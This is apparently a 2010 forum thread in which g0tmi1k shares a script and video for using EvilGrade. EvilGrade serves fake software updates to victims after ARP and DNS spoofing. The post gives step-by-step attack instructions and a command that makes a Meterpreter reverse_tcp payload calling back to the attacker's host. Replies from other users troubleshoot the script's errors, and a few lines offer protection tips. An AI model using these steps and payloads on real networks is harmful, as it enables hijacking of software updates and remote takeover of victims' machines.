[Script][Video] EvilGrade (v0.1.1)

[g0tmi1k]

Links
Watch video on-line: http://g0tmi1k.blip.tv/file/3629001
Download video: http://www.mediafire.com/?m55c5k5c7pf633f
Script (evilGrade[v0.1.3].sh): evilGrade[v0.1.3].sh
Script (evilGrade_install[v0.1.3].sh): http://www.mediafire.com/?xjoghumzimy


What is this?
EvilGrade: "ISR-evilgrade: is a modular framework that allow us to take advantage of poor upgrade implementations by injecting fake updates."
Metasploit: "Evilgrade Will Destroy Us All."

This is a "semi automate" script to help set-up an environment for EvilGrade so it can work its magic, and then there is a video demonstrating it in action which shows the effects of EvilGrade. EvilGrade is simply, another "option" to do after performing a "Man In The Middle" attack, that tricks certain software to believe there is an update available when really it's the attacker payload.


How does this work?
EvilGrade: "It works with modules, each module implements the structure needed to emulate a false update of specific applications/systems.Evilgrade needs the manipulation of the victim dns traffic."

EvilGrade creates a web server, which when a program's auto-update feature queries back "home" to check for an update, EvilGrade creates a spoofed updated version. The program then notify the target that there is an "update" available, and would they like to update. The danger of this is most users trust the program with the "auto update feature" and download and executes the update, when in reality, this is our payload.


What do I need?
> EvilGrade + Any Requirements (Data:ump, Digest::MD5, Time::HiRes)
> A Payload (I'm using metasploit and SBD)
> A method of doing a MITM Attack (I'm using arpspoof - part of dsniff suite)
> A way to spoof DNS (I'm using dnsspoof - part of dsniff suite)
> evilGrade[v0.1.3].sh (only if you wish for a helping hand to automate a few steps)
> evilGrade_install[v0.1.3].sh (only if you wish for a helping hand to get this working with BackTrack 4 Final)


How to use it?1.)Download the script(s)
2.) Install EvilGrade. (If your lazy use the script!)
3.)Check to see what interface is going to be used. (via ifconfig)
4.) Edit evilGrade[v0.1.3].sh (via kate evilGrade\[v0.1.3\].sh) to make it work with your system
5.) bash evilGrade\[v0.1.3\].sh OR bash evilGrade\[v0.1.3].sh TargetsIP (bash evilGrade\[v0.1.3\].sh 192.168.1.101)
6.) Pick your which software to attack. (via show modules)
7.) Pick your "agent" (Which program to insert/inject/replace the update)
8.) Check any other options (via show options)
9.) Start
10.) Wait...
11.) ...Game Over.




Commands:

Code:

sh evilGrade_install\[v0.1.3\].sh
help
show modules
exit

ifconfig
kate evilGrade\[v0.1.3\].sh
bash \[v0.1.3\].sh
192.168.1.101
config notepadplus
set agent '[&quot;/pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.103 X > <%OUT%>/tmp/g0tmi1k-evilgrade.exe<%OUT%>&quot;]'
start

hostname
ipconfig

How can I protect myself from this?
> Don't use the self updating features on software.
> When prompted about an update, visit the official homepage to download the update.
> Check the official homepage for a MD5/SHA1 hash.


Notes:
The video uses evilGrade[v0.1].sh
It's worth doing this "manually" (without the script) before using the script, so you have an idea of what's happening, and why. The script is only meant to save time.

Song: Public Domain - Operation Blade
Video length: 2:44
Capture length: 7:59

Blog Post: http://g0tmi1k.blogspot.com/2010/05/script-video-evilgrade-v011.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/28425-%5Bscript%5D%5Bvideo%5D-evilgrade-v0-1-1-a.html#post162025




~g0tmi1k

v0.1.3
+ Added arguments

+ Checks for superuser
+ Checks interfaces/paths/files exists
> Fix it - Couple of silly typos
> General code improvements
> Improved checking the targets IP Address

v0.1.2
+ Added debug mode
+ Added custom payload
+ Checks system setup before running
+ Fix gateway bug
> General code improvements

v0.1.1

+ First public release

[muminrz]

As always nice to see something new from you "g0tmi1k"
Thanks

[g0tmi1k]

As always nice to see something new from you "g0tmi1k"
Thanks

Thank you!
Nice to know that I have a fan (=

[jodeme]

Why would the victim want to manually update the Notepad++? But, generally, perfectly done scripts and vids! Keep it that way, g0tmi1k

[g0tmi1k]

evilGrade - Updated to v0.1.2
+ Fix Gateway Bug
+ Added debug mode
+ Added custom payload
+ Checks system setup before running
> Improved the Code/Clean it up.

[Yoma!]

Thank you for this!

I have some issues running the evilGrade script though..

Code:

 
root@bt:~# sh evilGrade.sh

: command not found4:
: command not found11:
: command not found16:
'vilGrade.sh: line 18: syntax error near unexpected token `{
'vilGrade.sh: line 18: `cleanup() {

[gerax]

I am getting same thing. Also similar errors on the evilGrade-install.sh
Any help would be appreciated thanks.

Thank you for this!

I have some issues running the evilGrade script though..

Code:

 
root@bt:~# sh evilGrade.sh

: command not found4:
: command not found11:
: command not found16:
'vilGrade.sh: line 18: syntax error near unexpected token `{
'vilGrade.sh: line 18: `cleanup() {

[g0tmi1k]

Thank you for this!

I have some issues running the evilGrade script though..

Code:

 
root@bt:~# sh evilGrade.sh

: command not found4:
: command not found11:
: command not found16:
'vilGrade.sh: line 18: syntax error near unexpected token `{
'vilGrade.sh: line 18: `cleanup() {

This is because "End Of Line", set to "Windows" instead of "UNIX". I think anyway...

[num3r]

Unfortunately, the same error as above. The previous version of the script, everything was fine. Any ideas to solve the problem? Thanks in advance.

[num3r]

Hi,

I change "End Of Line" to UNIX, but I am receiving new error:

evilGrade_v0.1.2.sh: line 80: -geometry: command not found
evilGrade_v0.1.2.sh: line 95: syntax error near unexpected token `elif'
evilGrade_v0.1.2.sh: line 95: `elif [ "$payload" == "sbd" ]; then'

Please - HELP

THX 4the script.